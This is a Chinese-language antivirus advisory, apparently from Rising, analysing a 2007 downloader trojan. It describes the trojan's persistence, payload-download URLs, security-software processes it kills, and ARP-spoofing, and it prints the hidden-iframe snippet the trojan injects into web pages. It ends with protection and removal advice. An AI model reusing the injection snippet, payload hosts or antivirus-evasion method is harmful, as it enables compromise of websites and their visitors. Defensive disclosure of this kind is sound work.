天高云淡

危险等级：★★★
病毒名称：Trojan.Win32.DL.AntiAV.a
截获时间：2007-10-26
入库版本：19.46.42
类型：木马下载病毒

感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000

威胁情况：

传播级别：中

全球化传播态势：低

清除难度：困难

破坏手段：下载，传播

这是一个VB语言编写的病毒，用NSpack加壳程序进行保护。

1、自我复制和自启动。将自己复制到%windir%下，文件名为：vsdrv.exe。同时在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下增加值vistadrv= vsdrv.exe，实现开机自启动。

2、尝试下载以下文件并运行：
http://zy3653.com/gz/1.txt
http://zy3653.com/gz/2.txt
http://www.wdsc888.cn/arp/rav.jpg

3、释放一个VBS脚本程序文件（s.vbe），该程序的功能为在本地文件中插入挂马网址。接着运行该脚本程序，试图向D，E，F分区中的index.asp，index.html，index.htm，default.asp，default.html等文件中插入“<iframe src=http://upx.kmip.net/muma/1.htm widht=0 height=0></iframe>”，完成本地挂马过程。

4、禁用部分安全软件相关的服务。通过net命令禁止Windows自带防火墙，金山毒霸、Norton等杀毒软件相关的系统服务。

5、结束部分安全软件进程。遍厉系统中的活动进程，进行进程名的比对，假如发现是病毒关心的杀毒软件进程，则强行结束。
病毒关心的进程名有：ccenter.exe ，rav.exe，runiep.exe，ras.exe，Iparmor.exe，360safe.exe，360tray.exe，kmailmon.exe等。

6、调用病毒生成的csrss.exe（并非Ｗindows操作系统的csrss.exe，为一ＡＲＰ欺骗挂马工具）进行ARP欺骗挂马。病毒调用route命令获得本网的网关IP地址，接着对其进行ＡＲＰ欺骗挂马，可导致通过网关的HTTP回应包都会被插入挂马网址，危害较大。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.46.42版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。